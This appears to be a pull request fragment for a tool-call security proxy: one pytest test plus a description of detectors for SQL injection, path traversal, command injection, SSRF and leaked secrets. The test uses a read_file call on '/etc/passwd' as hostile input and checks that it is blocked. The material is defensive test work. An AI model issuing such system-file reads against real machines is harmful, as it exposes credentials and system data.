+    def test_path_traversal_blocked_via_proxy(self, proxy_with_policy) -> None:
+        proc = proxy_with_policy(ALLOW_READ_FILE)
+        do_initialize(proc)
+        send_message(
+            proc,
+            _tool_call_msg("read_file", 2, {"path": "/etc/passwd"}),
+        )
+        response = read_message(proc)
+        assert "error" in response
+        assert response["error"]["code"] == -32600
+        assert response["error"]["data"]["matched_detector"] == "path_traversal"
+        assert response["error"]["data"]["matched_rule"] is None


### PR DESCRIPTION
## Summary
- **SQL injection detector** (#21): Two-tier regex matching for DROP, DELETE, UNION SELECT, tautologies, and stacked queries
- **Path traversal detector** (#22): Three-category pattern matching for `../` sequences, encoded variants, sensitive absolute paths, and null byte injection
- **Command injection detector** (#23): Context-aware shell metacharacter detection (`;`, `&&`, `|`, backticks, `$()`)
- **SSRF detector** (#24): Private/loopback/link-local/reserved IP detection in URLs via `ipaddress` stdlib
- **Secrets detector** (#25): 7-category regex matching for AWS keys, GitHub tokens, PEM keys, passwords, Slack/Stripe/Bearer tokens
- **Registry & engine wiring** (#26): Detector registry with `run_all()`, enable/disable support, and integration into the policy engine pipeline

## Details
- 6 commits implementing Issues #21–#26
- 5 detector modules with full test coverage (17 tests each: 8 positive, 7 negative, 2 edge cases)
- Detector registry with 8 pipeline tests
- Engine and proxy-policy integration tests updated
- ~3,000 lines added across 24 files

## Test plan
- [x] `uv run pytest` — all tests pass
- [ ] Verify detectors correctly block malicious tool calls end-to-end
- [ ] Review regex patterns for false positive/negative edge cases

Closes #21, closes #22, closes #23, closes #24, closes #25, closes #26

🤖 Generated with [Claude Code](https://claude.com/claude-code)